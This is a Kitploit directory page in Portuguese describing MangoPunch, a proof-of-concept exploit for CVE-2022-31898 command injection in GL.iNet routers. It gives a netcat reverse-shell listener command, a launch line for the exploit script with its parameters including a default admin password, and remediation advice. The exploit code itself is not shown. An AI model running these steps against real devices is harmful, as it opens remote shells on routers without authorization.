Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
MangoPunch-CVE-2022-31898 — Ferramenta de Injeção de Comando Autenticado (CVE-2022-31898) - HACKCONRD 2026. | Kitploit
Ferramentas/GitHubGitHub/cryptoghost1/mangopunch-cve-2022-31898
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubcryptoghost1/mangopunch-cve-2022-31898

MangoPunch-CVE-2022-31898

Ferramenta de Injeção de Comando Autenticado (CVE-2022-31898) - HACKCONRD 2026.

Ver Repositório
5há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🥭 MangoPunch: CVE-2022-31898

Injeção de Comando no SO Autenticada para Dispositivos GL.iNet

Python CVE Security

 __  __                         _____                 _     
|  \/  |                       |  __ \               | |    
| \  / | __ _ _ __   __ _  ___ | |__) |   _ _ __   ___| |__  
| |\/| |/ _` | '_ \ / _` |/ _ \|  ___/ | | | '_ \ / __| '_ \ 
| |  | | (_| | | | | (_| | (_) | |   | |_| | | | | (__| | | |
|_|  |_|\__,_|_| |_|\__, |\___/|_|    \__,_|_| |_|\___|_| |_|
                     __/ |                                   
                    |___/                                    

🔍 Visão Geral da Vulnerabilidade

Este repositório contém uma Prova de Conceito (PoC) técnica para uma vulnerabilidade de Execução Remota de Comandos (RCE) encontrada no GL.iNet MT300N-V2 (Mango) e outros modelos executando versões de firmware inferiores a 3.215.

A falha existe no parâmetro ping_addr da API de diagnóstico, permitindo que um atacante autenticado execute comandos arbitrários do sistema através de metacaracteres de shell (;).


🚀 Guia de Execução

1. Prepare seu Listener

Abra um terminal em sua máquina atacante (Kali Linux) e inicie um listener Netcat:

nc -lvnp 9292

2. Execute o Exploit

Use o seguinte comando para acionar a reverse shell:

python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>

🛠️ Parâmetros do Script

BandeiraNome CompletoDescriçãoPadrão
-R--rhostIP do Alvo Remoto (Roteador)Obrigatório
-P--rportPorta de Gerenciamento Web443
-L--lhostIP do Listener (Kali/Atacante)Obrigatório
-l--lportPorta do ListenerObrigatório
-p--pwdSenha do Administradorgoodlife
-t--httpsAtivar HTTPSFalse

🛡️ Correção

  • Atualize o Firmware: Certifique-se de que seu dispositivo esteja executando a versão 3.215 ou superior.
  • Validação de Entrada: Os desenvolvedores devem implementar validação rigorosa de Regex para parâmetros de IP/Hostname e evitar funções que invocam o shell e passam strings brutas para o SO.

Aviso: Esta ferramenta é apenas para fins educacionais e de teste de segurança autorizados. O autor não é responsável por qualquer uso indevido. MangoPunch: CVE-2022-31898

Baixar ferramenta